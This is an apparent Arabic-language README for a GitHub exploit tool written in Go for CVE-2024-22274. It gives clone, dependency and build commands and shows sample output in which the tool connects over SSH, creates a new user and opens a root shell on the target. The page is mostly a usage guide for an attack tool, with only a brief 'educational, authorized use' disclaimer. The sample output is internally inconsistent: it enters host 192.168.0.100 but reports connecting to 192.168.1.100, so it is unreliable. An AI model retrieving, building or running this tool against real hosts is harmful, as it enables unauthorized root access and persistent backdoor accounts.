
أداة استغلال مبنية بلغة Go لثغرة CVE-2024-22274 تقوم بإنشاء مستخدم جديد عبر SSH وتوفير شل جذر على الجهاز المستهدف لاختبار الاختراق المصرح به.
يحتوي هذا المستودع على استغلال لثغرة CVE-2024-22274. يقوم الاستغلال بإنشاء مستخدم جديد على جهاز بعيد عبر SSH ثم يوفر شل جذر.
استنساخ المستودع:
git clone https://github.com/Mustafa1986/CVE-2024-22274-RCE.git
cd CVE-2024-22274-RCE
تثبيت الحزم المطلوبة:
go mod init cve-2024-22274
go mod tidy
go get golang.org/x/crypto/ssh
go get golang.org/x/term
ترجمة برنامج Go:
go build -o cve-2024-22274-rce main.go
تشغيل البرنامج المترجم:
./cve-2024-22274-rce
اتبع التعليمات:
بعد إنشاء المستخدم، ستحصل على شل جذر على الجهاز الهدف. يمكنك تنفيذ الأوامر كمستخدم جديد.
[+] CVE-2024-22274 by Mustafa
[-] Enter host address: 192.168.0.100
[-] Enter port (default 22): 22
[-] Enter SSH username: root
[-] Enter SSH password: ********
[-] Enter new username: newuser
[-] Enter new password: ********
[+] Connected to 192.168.1.100 via SSH
[+] Created user newuser on 192.168.1.100
[+] Connected user newuser via SSH
[+] Root-shell# (type 'exit' to quit):
هذا الكود للأغراض التعليمية فقط. استخدمه بمسؤولية وفقط على الأنظمة التي لديك إذن لاختبارها.
هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.